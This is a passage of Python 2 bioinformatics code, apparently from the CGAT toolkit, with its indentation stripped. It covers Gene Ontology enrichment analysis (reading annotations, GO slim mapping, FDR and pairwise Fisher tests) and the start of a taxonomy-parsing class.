goid=None,
go_type=None,
description=None):
self.mDescription = description
self.mGOId = goid
self.mGOType = go_type
def __str__(self):
if self.mGOId is None:
return "\t".join(map(str, ("", "", "")))
else:
return "\t".join(map(str, (self.mGOId, self.mGOType, self.mDescription)))
def getHeaders(self):
return ["goid", "go_catagory", "go_description"]
# ------------------------------------------------------------------------
class GOMatch(GOInfo):
mEvidence = None
def __init__(self,
goid=None,
go_type=None,
description=None,
evidence=None):
GOInfo.__init__(self, goid, go_type, description)
self.mEvidence = evidence
def __str__(self):
return "\t".join(map(str, (self.mGOId, self.mGOType, self.mDescription, self.mEvidence)))
# ---------------------------------------------------------------------
def FilterByGOIds(gene2go, go2info):
"""
filter gene_id to go_id lookup by a list of go_ids
returns a new gene2go mapping.
used to restrict GO terms to GO_slim and remove alternates
gene2go # starting set, map of genes to go terms
    go2info # alt ids are repeats of superseding ids
"""
filtered_gene2go = {}
for gene_id in gene2go.keys():
new_go = set()
for go in gene2go[gene_id]:
if go.mGOId in go2info:
new_go.add(go)
if new_go:
filtered_gene2go[gene_id] = list(new_go)
return filtered_gene2go
# ---------------------------------------------------------------------
def MapGO2Slims(gene2go, go2slim, ontology=None):
"""filter gene2go lookup by a list of go_ids in go2slim.
gene2go: map of genes to go terms
go2slim: map of go categories to goslim go categories
If ontology is given, missing descriptions of go entries
are added from the ontology.
returns a new gene2go mapping.
"""
# build map of go identifiers to go info
map_go2info = {}
if ontology:
for go in ontology.values():
map_go2info[go.mId] = GOInfo(goid=go.mId,
go_type=go.mNameSpace,
description=go.mName)
else:
for gene_id, gos in gene2go.items():
for go in gos:
map_go2info[go.mGOId] = go
filtered_gene2go = {}
for gene_id, gos in gene2go.items():
new_go = set()
for go in gos:
if go.mGOId in go2slim:
for gg in go2slim[go.mGOId]:
if gg in map_go2info:
new_go.add(map_go2info[gg])
else:
raise IndexError(
"description for mapped go term not present: %s -> %s" %
(go.mGOId, gg))
if new_go:
filtered_gene2go[gene_id] = list(new_go)
return filtered_gene2go
# ------------------------------------------------------------------------
def GetGOSlims(infile):
"""
returns a map of go identifiers to slim categories
    Input is the output of Chris Mungall's map2slim.pl.
"""
go2go = {}
for line in infile:
if line[:len("part_of")] == "part_of":
continue
mapped, parents = line.split("//")
go, goslims = mapped.split("=>")
goslims = goslims.split(" ")
if len(goslims) == 0:
continue
go2go[go.strip()] = filter(
lambda x: len(x), map(lambda x: x.strip(), goslims))
return go2go
# ------------------------------------------------------------------------
def GetGOFrequencies(gene2go, genes):
"""count number of each go category in gene list.
return a tuple containing:
* the total number of GO categories found.
* dictionary of counts per GO category
* dictionary of genes found with GO categories
"""
counts = {}
total = 0
found_genes = {}
for gene_id in genes:
if gene_id not in gene2go:
continue
found_genes[gene_id] = 1
for go in gene2go[gene_id]:
if go.mGOId not in counts:
counts[go.mGOId] = 0
counts[go.mGOId] += 1
total += 1
return total, counts, found_genes
# ------------------------------------------------------------------------
def AnalyseGO(gene2go,
genes,
genes_background=None,
do_probabilities=True):
"""analyse go ids.
goids: list of goids to analyse
genes: sample set of genes
genes_background: background set of genes (default: all)
"""
if genes_background is None:
genes_background = gene2go.keys()
result = GOResults()
# get background frequencies
(background_counts_total, background_counts, background_genes) = \
GetGOFrequencies(gene2go,
genes_background)
result.mBackgroundCountsTotal = background_counts_total
result.mBackgroundNumCategories = len(background_counts)
result.mBackgroundGenes = background_genes
# get sample frequencies
(sample_counts_total, sample_counts, sample_genes) = \
GetGOFrequencies(gene2go,
genes)
result.mNumGenes = len(genes)
result.mSampleCountsTotal = sample_counts_total
result.mSampleNumCategories = len(sample_counts)
result.mSampleGenes = sample_genes
# test for over or underrepresented categories in the slims
# report results for all go categories in the background
# so that also categories completely absent in the foreground (sample)
# are considered.
for go_id in background_counts.keys():
result_go = GOResult(go_id)
# use gene counts
result_go.mSampleCountsCategory = sample_counts.get(go_id, 0)
result_go.mSampleCountsTotal = len(sample_genes)
result_go.mBackgroundCountsTotal = len(background_genes)
result_go.mBackgroundCountsCategory = background_counts[go_id]
E.debug("processing %s: genes in foreground=%i, genes in backgound=%i, sample_counts=%i, background_counts=%i" %
(go_id,
len(sample_genes),
len(background_genes),
sample_counts.get(go_id, 0),
background_counts.get(go_id, 0),
)
)
if do_probabilities:
try:
result_go.UpdateProbabilities()
except AssertionError, msg:
print msg
print "# error while calculating probabilities for %s" % go_id
print "# genes in sample", sample_genes
print "# counts in sample: %i out of %i total" % (result_go.mSampleCountsCategory, result_go.mSampleCountsTotal)
print "# counts in background %i out of %i total" % (result_go.mBackgroundCountsCategory, result_go.mBackgroundCountsTotal)
for x in sample_genes.keys():
for y in gene2go[x]:
print x, str(y)
sys.exit(0)
result.mResults[go_id] = result_go
return result
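# Minimal usage sketch with made-up data (not part of the original module):
# two genes annotated to GO:0000001 and one to GO:0000002; the foreground is
# the first two genes and the background defaults to all annotated genes.
def _demo_analyse_go():
    gene2go = {
        "gene1": [GOMatch("GO:0000001", "biol_process", "demo term", "IEA")],
        "gene2": [GOMatch("GO:0000001", "biol_process", "demo term", "IEA")],
        "gene3": [GOMatch("GO:0000002", "biol_process", "other term", "IEA")],
    }
    results = AnalyseGO(gene2go, genes=["gene1", "gene2"])
    return results.mResults  # dict of GOResult objects keyed by GO id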
# ------------------------------------------------------------------------
def GetGOStatement(go_type, database, species):
"""build statement to get GO assignments for genes from ENSEMBL."""
if database in ("ensembl_mart_27_1", ):
statement = """SELECT DISTINCTROW
gene_stable_id, glook_%s_id, description, olook_evidence_code
FROM %s.%s_gene_ensembl__go_%s__look
WHERE glook_%s_id IS NOT NULL
GROUP BY gene_stable_id, glook_%s_id, description
ORDER BY gene_stable_id
""" % (go_type,
database, species, go_type,
go_type, go_type)
elif database in ("ensembl_mart_31", "ensembl_mart_37", "ensembl_mart_41"):
statement = """SELECT DISTINCTROW
gene_stable_id, glook_%s_id, description, olook_evidence_code
FROM %s.%s_go_%s__go_%s__main
WHERE glook_%s_id IS NOT NULL
GROUP BY gene_stable_id, glook_%s_id, description
ORDER BY gene_stable_id
""" % (go_type,
database, species, go_type, go_type,
go_type, go_type)
elif re.search("core", database):
if go_type == "biol_process":
go_type = "biological_process"
elif go_type == "mol_function":
go_type = "molecular_function"
elif go_type == "cell_location":
go_type = "cellular_component"
else:
raise "unknown go_type %s" % go_type
x = re.search("(\d+)", database)
if not x:
raise "can't find version number in database %s" % database
version = int(x.groups()[0])
if version <= 54:
go_database = "ensembl_go_%s" % version
go_field = "acc"
statement = """SELECT DISTINCTROW
g.stable_id, xref.dbprimary_acc, go.name, 'NA'
FROM gene, transcript, translation,
gene_stable_id as g, object_xref as o, xref,
%(go_database)s.term AS go
WHERE gene.gene_id = transcript.gene_id
AND transcript.transcript_id = translation.transcript_id
AND g.gene_id = gene.gene_id
AND translation.translation_id = o.ensembl_id
AND xref.xref_id = o.xref_id
AND go.%(go_field)s = xref.dbprimary_acc
AND go.term_type = '%(go_type)s'
AND xref.external_db_id = 1000
""" % locals()
elif version <= 66:
go_database = "ensembl_ontology_%s" % version
go_field = "accession"
statement = """SELECT DISTINCTROW
g.stable_id, xref.dbprimary_acc, go.name, 'NA'
FROM gene, transcript, translation,
gene_stable_id as g, object_xref as o, xref,
%(go_database)s.term AS go,
%(go_database)s.ontology AS ontology
WHERE gene.gene_id = transcript.gene_id
AND transcript.transcript_id = translation.transcript_id
AND g.gene_id = gene.gene_id
AND translation.translation_id = o.ensembl_id
AND xref.xref_id = o.xref_id
AND go.%(go_field)s = xref.dbprimary_acc
AND go.ontology_id = ontology.ontology_id
AND ontology.namespace = '%(go_type)s'
AND xref.external_db_id = 1000
""" % locals()
else:
go_database = "ensembl_ontology_%s" % version
go_field = "accession"
statement = """SELECT DISTINCTROW
gene.stable_id, xref.dbprimary_acc, go.name, 'NA'
FROM gene, transcript, translation,
object_xref as o, xref,
%(go_database)s.term AS go,
%(go_database)s.ontology AS ontology
WHERE gene.gene_id = transcript.gene_id
AND transcript.transcript_id = translation.transcript_id
AND translation.translation_id = o.ensembl_id
AND xref.xref_id = o.xref_id
AND go.%(go_field)s = xref.dbprimary_acc
AND go.ontology_id = ontology.ontology_id
AND ontology.namespace = '%(go_type)s'
AND xref.external_db_id = 1000
""" % locals()
else:
raise "unknown ensmart version %s" % database
return statement
def ReadGene2GOFromDatabase(dbhandle, go_type, database, species):
"""read go assignments from ensembl database.
returns a dictionary of lists.
(one to many mapping of genes to GO categories)
and a dictionary of go-term to go information
Note: assumes that external_db_id for GO is 1000
"""
statement = GetGOStatement(go_type, database, species)
result = Database.executewait(dbhandle, statement,
retries=0).fetchall()
gene2go = {}
go2info = collections.defaultdict(GOInfo)
for gene_id, goid, description, evidence in result:
gm = GOMatch(goid, go_type, description, evidence)
gi = GOInfo(goid, go_type, description)
if gene_id not in gene2go:
gene2go[gene_id] = []
gene2go[gene_id].append(gm)
go2info[goid] = gi
return gene2go, go2info
def DumpGOFromDatabase(outfile,
dbhandle,
options):
"""read go assignments from database.
and dump them into a flatfile.
(one to many mapping of genes to GO categories)
and a dictionary of go-term to go information
"""
E.info("category\ttotal\tgenes\tcategories")
all_genes = collections.defaultdict(int)
all_categories = collections.defaultdict(int)
all_ntotal = 0
outfile.write("go_type\tgene_id\tgo_id\tdescription\tevidence\n")
for go_type in options.ontology:
genes = collections.defaultdict(int)
categories = collections.defaultdict(int)
ntotal = 0
statement = GetGOStatement(go_type, options.database_name,
options.species)
results = Database.executewait(
dbhandle, statement, retries=0).fetchall()
for result in results:
outfile.write("\t".join(map(str, (go_type,) + result)) + "\n")
gene_id, goid, description, evidence = result
genes[gene_id] += 1
categories[goid] += 1
ntotal += 1
all_genes[gene_id] += 1
all_categories[goid] += 1
all_ntotal += 1
E.info("%s\t%i\t%i\t%i" % (go_type, ntotal,
len(genes),
len(categories)))
E.info("%s\t%i\t%i\t%i" % ("all",
all_ntotal,
len(all_genes),
len(all_categories)))
return
# ---------------------------------------------------------------------------
def ReadGene2GOFromFile(infile, synonyms={}, obsolete={}):
"""reads GO mappings for all go_types from a
file.
    If synonyms is given, goids in synonyms will be translated.
Terms in *obsolete* will be discarded.
returns two maps: gene2go maps genes to go categories
and go2info maps go categories to information.
"""
gene2gos = {}
go2infos = {}
c = E.Counter()
for line in infile:
if line[0] == "#":
continue
try:
go_type, gene_id, goid, description, evidence = line[
:-1].split("\t")
except ValueError, msg:
raise ValueError("parsing error in line '%s': %s" %
(line[:-1], msg))
if go_type == "go_type":
continue
c.input += 1
if goid in synonyms:
c.synonyms += 1
goid = synonyms[goid]
if goid in obsolete:
c.obsolete += 1
continue
gm = GOMatch(goid, go_type, description, evidence)
gi = GOInfo(goid, go_type, description)
if go_type not in gene2gos:
gene2gos[go_type] = {}
go2infos[go_type] = {}
gene2go = gene2gos[go_type]
go2info = go2infos[go_type]
if gene_id not in gene2go:
gene2go[gene_id] = []
gene2go[gene_id].append(gm)
go2info[goid] = gi
c.output += 1
E.debug("read gene2go assignments: %s" % str(c))
return gene2gos, go2infos
# ---------------------------------------------------------------------------
def CountGO(gene2go):
"""count number of genes and go categories in mapping."""
cats = collections.defaultdict(int)
nmaps = 0
for k, vv in gene2go.items():
for v in vv:
nmaps += 1
cats[v.mGOId] += 1
return len(gene2go), len(cats), nmaps, cats
def removeCategories(gene2go, categories):
'''remove all genes that map to *categories*.'''
for k, vv in gene2go.items():
gene2go[k] = [v for v in vv if v.mGOId not in categories]
# ---------------------------------------------------------------------------
def countGOs(gene2gos):
"""return map of number of genes and go categories in mapping."""
genes, goids = collections.defaultdict(int), collections.defaultdict(int)
for cat, gene2go in gene2gos.iteritems():
for gene_id, vv in gene2go.iteritems():
genes[gene_id] += 1
for v in vv:
goids[v.mGOId] += 1
return genes, goids
# ---------------------------------------------------------------------------
def ReadGeneLists(filename_genes, gene_pattern=None):
"""read gene lists from filename in matrix.
returns a tuple (list of all genes, dictionary of gene lists)
"""
if filename_genes == "-":
infile = sys.stdin
else:
infile = IOTools.openFile(filename_genes, "r")
headers, table = CSV.readTable(infile.readlines(), as_rows=False)
if filename_genes != "-":
infile.close()
all_genes = table[0]
# if there is only a single column, add a dummy column
if len(table) == 1:
table.append([1] * len(table[0]))
headers.append("foreground")
E.info("read %i genes from %s" % (len(all_genes), filename_genes))
if gene_pattern:
rx = re.compile(gene_pattern)
all_genes = map(lambda x: rx.search(x).groups()[0], all_genes)
gene_lists = collections.OrderedDict()
for header, col in zip(headers[1:], table[1:]):
s = list(set([x for x, y in zip(all_genes, col) if y != "0"]))
gene_lists[header] = set(s)
return all_genes, gene_lists
# ---------------------------------------------------------------------------
def buildGO2Genes(gene2gos, ancestors=None):
'''invert the dictionary genes2go.
If ancestors is given, add missing ancestral information.
'''
go2genes = collections.defaultdict(set)
for gene_id, terms in gene2gos.iteritems():
for term in terms:
go2genes[term.mGOId].add(gene_id)
if ancestors:
for anc in ancestors[term.mGOId]:
go2genes[anc].add(gene_id)
return go2genes
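# Minimal usage sketch with made-up data: invert a gene-to-GO mapping and, via
# a hypothetical ancestors dictionary, propagate the annotation up the DAG.
def _demo_build_go2genes():
    gene2gos = {"gene1": [GOInfo("GO:0000002", "biol_process", "child term")]}
    ancestors = {"GO:0000002": ["GO:0000001"]}
    # expected: {'GO:0000002': set(['gene1']), 'GO:0000001': set(['gene1'])}
    return buildGO2Genes(gene2gos, ancestors=ancestors)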
# ---------------------------------------------------------------------------
def GetCode(v):
"""return a code for over/underrepresentation."""
if v.mRatio > 1.0:
code = "+"
elif v.mRatio < 1.0:
code = "-"
else:
code = "?"
return code
# ---------------------------------------------------------------------------
def convertGo2Goslim(options):
"""read gene list with GO assignments and convert to GO slim
categories."""
E.info("reading GO assignments from stdin")
gene2gos, go2infos = ReadGene2GOFromFile(options.stdin)
input_genes, input_goids = countGOs(gene2gos)
#############################################################
# read GO ontology from file
assert options.filename_ontology, "please supply a GO ontology"
E.info("reading ontology from %s" % (options.filename_ontology))
infile = IOTools.openFile(options.filename_ontology)
ontology = readOntology(infile)
infile.close()
go2infos = collections.defaultdict(dict)
# substitute go2infos
for go in ontology.values():
go2infos[go.mNameSpace][go.mId] = GOInfo(go.mId,
go_type=go.mNameSpace,
description=go.mName)
E.info("reading GO assignments from %s" % options.filename_slims)
go_slims = GetGOSlims(IOTools.openFile(options.filename_slims, "r"))
if options.loglevel >= 1:
v = set()
for x in go_slims.values():
for xx in x:
v.add(xx)
E.info("read go slims from %s: go=%i, slim=%i" %
(options.filename_slims,
len(go_slims),
len(v)))
output_goids, output_genes = set(), set()
noutput = 0
options.stdout.write(
"\t".join(("go_type", "gene_id", "go_id",
"description", "evidence")) + "\n")
for category, gene2go in sorted(gene2gos.items()):
gene2go = MapGO2Slims(gene2go, go_slims, ontology)
for gene_id, values in sorted(gene2go.items()):
output_genes.add(gene_id)
for go in sorted(values, key=lambda x: x.mGOId):
output_goids.add(go.mGOId)
options.stdout.write("%s\t%s\t%s\t%s\t%s\n" %
(go.mGOType,
gene_id,
go.mGOId,
go.mDescription,
"NA", ))
noutput += 1
E.info(
("ninput_genes=%i, ninput_goids=%i, noutput_gene=%i, "
"noutput_goids=%i, noutput=%i") %
(len(input_genes), len(input_goids),
len(output_genes), len(output_goids),
noutput))
def outputResults(outfile,
pairs,
go2info,
options,
fdrs=None,
samples=None,
gene2go=None,
foreground=None,
gene2name=None):
'''output GO results to outfile.
If foreground is given, output a list of gene identifiers in the
foreground.
If gene2name is given, output a columns with gene
names (instead of identifiers)
'''
headers = ["code",
"scount", "stotal", "spercent",
"bcount", "btotal", "bpercent",
"ratio",
"pvalue", "pover", "punder",
"goid", "category", "description"]
if fdrs:
headers += ["fdr"]
if gene2go and foreground:
headers += ['foreground']
go2genes = buildGO2Genes(gene2go)
if gene2name:
headers += ['genes']
if samples:
headers += ["min", "max", "zscore", "mpover", "mpunder",
"nfdr_expected",
"CI95lower", "CI95upper"]
outfile.write("\t".join(headers) + "\n")
nselected = 0
for k, v in pairs:
code = GetCode(v)
n = go2info.get(k, GOInfo())
outfile.write("%s\t%s\t%s" % (code, str(v), n))
if options.fdr:
fdr = fdrs[k][0]
outfile.write("\t%f" % fdr)
if options.sample:
if k in samples:
s = samples[k]
# calculate values for z-score
if s.mStddev > 0:
zscore = abs(
float(v.mSampleCountsCategory) - s.mMean) / s.mStddev
else:
zscore = 0.0
outfile.write("\t%i\t%i\t%f\t%5.2e\t%5.2e\t%6.4f\t%6.4f\t%6.4f" %
(s.mMin,
s.mMax,
zscore,
min(s.mProbabilitiesOverRepresentation),
min(s.mProbabilitiesUnderRepresentation),
scipy.mean(s.mCounts),
scipy.stats.scoreatpercentile(s.mCounts, 5),
scipy.stats.scoreatpercentile(s.mCounts, 95),
))
if foreground:
if k in go2genes:
g = [x for x in go2genes[k] if x in foreground]
if gene2name:
g = [gene2name.get(x, '?') for x in g]
g = ";".join(g)
else:
g = ""
outfile.write("\t%s" % g)
outfile.write("\n")
def getSamples(gene2go, foreground, background, options, test_ontology,
go2info):
sample_size = options.sample
# List of all minimum probabilities in simulation
simulation_min_pvalues = []
E.info("sampling: calculating %i samples: " % (sample_size))
counts = {}
prob_overs = {}
prob_unders = {}
samples = {}
options.stdlog.write("# ")
options.stdlog.flush()
for x in range(sample_size):
if options.loglevel >= 1:
options.stdlog.write(".")
options.stdlog.flush()
# get shuffled array of genes from background
sample_genes = random.sample(background, len(foreground))
go_results = AnalyseGO(gene2go, sample_genes, background)
pairs = go_results.mResults.items()
for k, v in pairs:
if k not in counts:
counts[k] = []
prob_overs[k] = []
prob_unders[k] = []
counts[k].append(v.mSampleCountsCategory)
prob_overs[k].append(v.mProbabilityOverRepresentation)
prob_unders[k].append(v.mProbabilityUnderRepresentation)
simulation_min_pvalues.append(v.mPValue)
if options.loglevel >= 1:
sys.stdout.write("\n")
sys.stdout.flush()
E.info("sampling: sorting %i P-Values" % len(simulation_min_pvalues))
simulation_min_pvalues.sort()
simulation_min_pvalues = numpy.array(simulation_min_pvalues)
samples = {}
if options.output_filename_pattern:
filename = options.output_filename_pattern % {
'go': test_ontology, 'section': "samples"}
E.info("sampling results go to %s" % filename)
outfile = IOTools.openFile(filename, "w", create_dir=True)
else:
outfile = sys.stdout
outfile.write("\t".join(("goid", "min", "max", "mean", "median", "stddev",
"CI95lower", "CI95upper",
"pover", "punder", "goid",
"category", "description")) + "\n")
for k in counts.keys():
c = counts[k]
prob_overs[k].sort()
prob_unders[k].sort()
s = GOSample(min(c),
max(c),
scipy.mean(c),
numpy.std(c),
numpy.array(prob_overs[k]),
numpy.array(prob_unders[k]),
counts[k])
samples[k] = s
outfile.write("%s\t%i\t%i\t%f\t%f\t%f\t%f\t%f\t%f\t%f\t%s\n" %
(k,
min(c),
max(c),
scipy.mean(c),
scipy.median(c),
numpy.std(c),
scipy.stats.scoreatpercentile(c, 5),
scipy.stats.scoreatpercentile(c, 95),
min(prob_overs[k]),
min(prob_unders[k]),
go2info[k]))
if options.output_filename_pattern:
outfile.close()
return samples, simulation_min_pvalues
def computeFDRs(go_results,
foreground,
background,
options,
test_ontology,
gene2go,
go2info):
pairs = go_results.mResults.items()
E.info("calculating the FDRs using method `%s`" % options.qvalue_method)
samples = None
observed_min_pvalues = [min(x[1].mProbabilityOverRepresentation,
x[1].mProbabilityUnderRepresentation) for x in pairs]
fdrs = {}
method = options.qvalue_method
if options.qvalue_method == "storey":
# compute fdr via Storey's method
try:
fdr_data = Stats.doFDR(observed_min_pvalues)
except ValueError, msg:
E.warn("failure in q-value computation: %s" % msg)
E.warn("reverting to Bonferroni correction")
method = "bonf"
fdr_data = Stats.FDRResult()
l = float(len(observed_min_pvalues))
fdr_data.mQValues = [min(1.0, x * l) for x in observed_min_pvalues]
for pair, qvalue in zip(pairs, fdr_data.mQValues):
fdrs[pair[0]] = (qvalue, 1.0, 1.0)
elif options.qvalue_method == "empirical":
assert options.sample > 0, "requiring a sample size of > 0"
#######################################################################
# sampling
# for each GO-category:
# get maximum and minimum counts in x samples -> calculate minimum/maximum significance
# get average and stdev counts in x samples -> calculate z-scores for
# test set
samples, simulation_min_pvalues = getSamples(gene2go,
foreground,
background,
options,
test_ontology,
go2info)
# compute P-values from sampling
observed_min_pvalues.sort()
observed_min_pvalues = numpy.array(observed_min_pvalues)
sample_size = options.sample
for k, v in pairs:
if k in samples:
s = samples[k]
else:
raise KeyError("category %s not in samples" % k)
# calculate values for z-score
if s.mStddev > 0:
zscore = abs(
float(v.mSampleCountsCategory) - s.mMean) / s.mStddev
else:
zscore = 0.0
#############################################################
# FDR:
# For each p-Value p at node n:
# a = average number of nodes in each simulation run with P-Value < p
# this can be obtained from the array of all p-values and all nodes
# simply divided by the number of samples.
# aka: expfpos=experimental false positive rate
# b = number of nodes in observed data, that have a P-Value of less than p.
# aka: pos=positives in observed data
# fdr = a/b
pvalue = v.mPValue
# calculate values for FDR:
# nfdr = number of entries with P-Value better than node.
a = 0
while a < len(simulation_min_pvalues) and \
simulation_min_pvalues[a] < pvalue:
a += 1
a = float(a) / float(sample_size)
b = 0
while b < len(observed_min_pvalues) and \
observed_min_pvalues[b] < pvalue:
b += 1
if b > 0:
fdr = min(1.0, float(a) / float(b))
else:
fdr = 1.0
fdrs[k] = (fdr, a, b)
else:
qvalues = R['p.adjust'](
observed_min_pvalues, method=options.qvalue_method)
fdr_data = Stats.FDRResult()
fdr_data.mQValues = list(qvalues)
for pair, qvalue in zip(pairs, fdr_data.mQValues):
fdrs[pair[0]] = (qvalue, 1.0, 1.0)
return fdrs, samples, method
################################################################
################################################################
################################################################
def getFileName(options, **kwargs):
'''return a filename
Placeholders in filename are string-substituted with the
dictionary in kwargs.
'''
if options.output_filename_pattern:
filename = options.output_filename_pattern % kwargs
E.info("output for section '%s' go to %s" %
(kwargs.get("section", "unknown"), filename))
outfile = IOTools.openFile(filename, "w", create_dir=True)
else:
outfile = options.stdout
return outfile
################################################################
################################################################
################################################################
def buildMatrix(results, valuef, dtype=numpy.float, default=0):
'''build a matrix from a field in *results*
The value stored in the matrix is accessed via *valuef*.
'''
row_headers = [set([x[0] for x in y]) for y in results]
row_headers = sorted(list(row_headers[0].union(*row_headers[1:])))
map_row = dict(zip(row_headers, range(len(row_headers))))
matrix = numpy.zeros((len(row_headers), len(results)), dtype=dtype)
if default != 0:
matrix[:] = default
for col, pairs in enumerate(results):
for row, v in pairs:
try:
matrix[map_row[row]][col] = valuef(v)
except ValueError:
# ignore errors for log(0)
pass
return matrix, row_headers
################################################################
################################################################
################################################################
def selectSignificantResults(pairs, fdrs, options):
'''select a set of significant results.
'''
filtered_pairs = []
for k, v in pairs:
is_ok = False
pvalue = v.mPValue
if options.fdr:
(fdr, expfpos, pos) = fdrs[k]
if fdr < options.threshold:
is_ok = True
else:
if pvalue < options.threshold:
is_ok = True
if is_ok:
filtered_pairs.append((k, v))
return filtered_pairs
################################################################
################################################################
################################################################
def outputMultipleGeneListResults(results,
all_genelists_with_results,
test_ontology,
go2info,
options,
section):
'''select a set of significant results.
'''
col_headers = all_genelists_with_results
if len(results) == 0:
E.warn('no significant results - no matrices output')
return
assert len(col_headers) == len(results)
def _output(section, subsection, valuef, dtype):
# fold change matrix
matrix, row_headers = buildMatrix(results,
valuef=valuef,
dtype=dtype)
outfile = getFileName(options,
go=test_ontology,
section=section,
set='%s_all' % subsection)
IOTools.writeMatrix(
outfile, matrix, row_headers, col_headers, row_header="category")
outfile = getFileName(options,
go=test_ontology,
section=section,
set='%s_alldesc' % subsection)
IOTools.writeMatrix(outfile, matrix,
["%s:%s" % (x, go2info[x].mDescription)
for x in row_headers],
col_headers, row_header="category")
_output('l2fold', section,
valuef=lambda x: math.log(x.mRatio + 0.00000001, 2),
dtype=numpy.float)
_output('l10pvalue', section,
valuef=lambda x: int(-10 * math.log(x.mPValue, 10)),
dtype=numpy.int)
_output('l10qvalue', section,
valuef=lambda x: int(-10 * math.log(x.mQValue, 10)),
dtype=numpy.int)
def pairwiseGOEnrichment(results_per_genelist, labels, test_ontology, go2info,
options):
'''compute pairwise enrichment between sets.
    The purpose of this method is to find categories that are differentially
    enriched between a pair of gene lists.
    Each shared category is tested with Fisher's exact test on the 2x2 table
    of foreground counts in the category versus the remaining foreground
    counts of the two lists.
    The assumption is that the background set is the same in all gene lists.
    The workflow is thus::
        for each combination of two gene lists:
            for each GO category:
                get counts in foreground, total counts of foreground
                compute Fisher's exact test and save the P-value
apply fdr - output significant differences.
'''
dicts = [dict(x) for x in results_per_genelist]
PairResult = collections.namedtuple("PairResult",
"goid set1 set2 counts1 total1 pvalue1 qvalue1 counts2 total2 pvalue2 qvalue2 pvalue qvalue description")
outfile = getFileName(options,
go=test_ontology,
section='summary',
set="pairs")
outfile.write(
"set1\tset2\ttotal1\ttotal2\tshared\tskipped\ttested\tsignificant\tinsignificant\n")
results = []
total = len(dicts) * (len(dicts) - 1) / 2
iteration = 0
min_observed_counts = options.pairs_min_observed_counts
for x, genelist1 in enumerate(dicts):
x_go_categories = set(genelist1.keys())
for y, genelist2 in enumerate(dicts[:x]):
iteration += 1
if iteration % 10 == 0:
E.info("iteration: %i/%i (%5.2f%%)" %
(iteration, total, 100.0 * iteration / total))
y_go_categories = set(genelist2.keys())
shared = x_go_categories.intersection(y_go_categories)
c = E.Counter()
for category in shared:
c.shared += 1
xx = genelist1[category]
yy = genelist2[category]
# discard all tests with few observations in the observed
# counts
if xx.mSampleCountsCategory < min_observed_counts and yy.mSampleCountsCategory < min_observed_counts:
c.skipped += 1
continue
observed = (xx.mSampleCountsCategory, yy.mSampleCountsCategory)
aa, bb, cc, dd = \
(xx.mSampleCountsCategory,
yy.mSampleCountsCategory,
xx.mSampleCountsTotal - xx.mSampleCountsCategory,
yy.mSampleCountsTotal - yy.mSampleCountsCategory)
if cc == dd == 0:
c.skipped += 1
continue
c.tested += 1
fisher, pvalue = scipy.stats.fisher_exact(numpy.array(
((aa, bb),
(cc, dd))))
if pvalue < 0.05:
c.significant_pvalue += 1
else:
c.insignificant_pvalue += 1
results.append(PairResult._make((category,
labels[x],
labels[y],
xx.mSampleCountsCategory,
xx.mSampleCountsTotal,
xx.mPValue,
xx.mQValue,
yy.mSampleCountsCategory,
yy.mSampleCountsTotal,
yy.mPValue,
yy.mQValue,
pvalue,
1.0,
go2info[category].mDescription)))
outfile.write("\t".join(map(str,
(labels[x], labels[y],
len(x_go_categories),
len(y_go_categories),
c.shared,
c.skipped,
c.tested,
c.significant_pvalue,
c.insignicant_pvalue))) + "\n")
if options.output_filename_pattern:
outfile.close()
if options.fdr:
pvalues = [x.pvalue for x in results]
if options.qvalue_method == "storey":
# compute fdr via Storey's method
try:
fdr_data = Stats.doFDR(pvalues)
except ValueError, msg:
E.warn("failure in q-value computation: %s" % msg)
E.warn("reverting to Bonferroni correction")
method = "bonf"
fdr_data = Stats.FDRResult()
l = float(len(pvalues))
fdr_data.mQValues = [min(1.0, x * l) for x in pvalues]
qvalues = fdr_data.mQValues
else:
qvalues = R['p.adjust'](pvalues, method=options.qvalue_method)
# update qvalues
results = [x._replace(qvalue=y) for x, y in zip(results, qvalues)]
outfile = getFileName(options,
go=test_ontology,
section='pairs',
set="pairs")
outfile.write("\t".join(PairResult._fields) + "\n")
for result in results:
outfile.write("\t".join(map(str, result)) + "\n")
if options.output_filename_pattern:
outfile.close()
```
#### File: cgat/CGAT/LCA.py
```python
class LCA(object):
'''
    lca class describing the taxa associated with a sequence
'''
def __init__(self):
self.identifier = None
self.domain = None
self.superkingdom_plus = None
self.superkingdom_plus_plus = None
self.kingdom = None
self.kingdom_plus = None
self.kingdom_plus_plus = None
self.phylum = None
self.phylum_plus = None
self.phylum_plus_plus = None
self._class = None
self._class_plus = None
self._class_plus_plus = None
self.order = None
self.order_plus = None
self.order_plus_plus = None
self.family = None
self.family_plus = None
self.family_plus_plus = None
self.genus = None
self.genus_plus = None
self.genus_plus_plus = None
self.species = None
self.species_plus = None
self.species_plus_plus = None
self.level = None
def parse(self, line):
'''
parse the line
'''
data = line.split(";")
self.identifier = data[0]
for taxa in data[2:]:
taxa = taxa.strip()
# ignore root
if "[root" in taxa:
continue
if "[" not in taxa:
continue
taxa = taxa.split(" ")
level, tax = taxa[0], taxa[1:]
level = level.replace("[", "").replace("]", "")
if len(tax) > 1:
tax = "_".join(tax)
else:
tax = tax[0]
# Eukaryotes have a lot of sub-taxa e.g. Phylum+++++++.
# Superkingdom is taken as the Domain and then kingdom
# and so on. At the moment we are only going to consider
# up to two sub-levels per global level
if level == "SuperKingdom":
self.domain = tax
elif level == "SuperKingdom+":
self.superkingdom_plus = tax
elif level == "SuperKingdom++":
self.superkingdom_plus_plus = tax
elif level == "Kingdom":
self.kingdom = tax
elif level == "Kingdom+":
self.kingdom_plus = tax
elif level == "Kingdom++":
self.kingdom_plus_plus = tax
elif level == "Phylum":
self.phylum = tax
elif level == "Phylum+":
self.phylum_plus = tax
elif level == "Phylum++":
self.phylum_plus_plus = tax
elif level == "Class":
self._class = tax
elif level == "Class+":
self._class_plus = tax
elif level == "Class++":
self._class_plus_plus = tax
elif level == "Order":
self.order = tax
elif level == "Order+":
self.order_plus = tax
elif level == "Order++":
self.order_plus_plus = tax
elif level == "Family":
self.family = tax
elif level == "Family+":
self.family_plus = tax
elif level == "Family++":
self.family_plus_plus = tax
elif level == "Genus":
self.genus = tax
elif level == "Genus+":
self.genus_plus = tax
elif level == "Genus++":
self.genus_plus_plus = tax
elif level == "Species":
self.species = tax
elif level == "Species+":
self.species_plus = tax
elif level == "Species++":
self.species_plus_plus = tax
        # set missing levels to "NA" if they are absent from the taxonomy
if not self.domain:
self.domain = "NA"
if not self.superkingdom_plus:
self.superkingdom_plus = "NA"
if not self.superkingdom_plus_plus:
self.superkingdom_plus_plus = "NA"
if not self.kingdom:
self.kingdom = "NA"
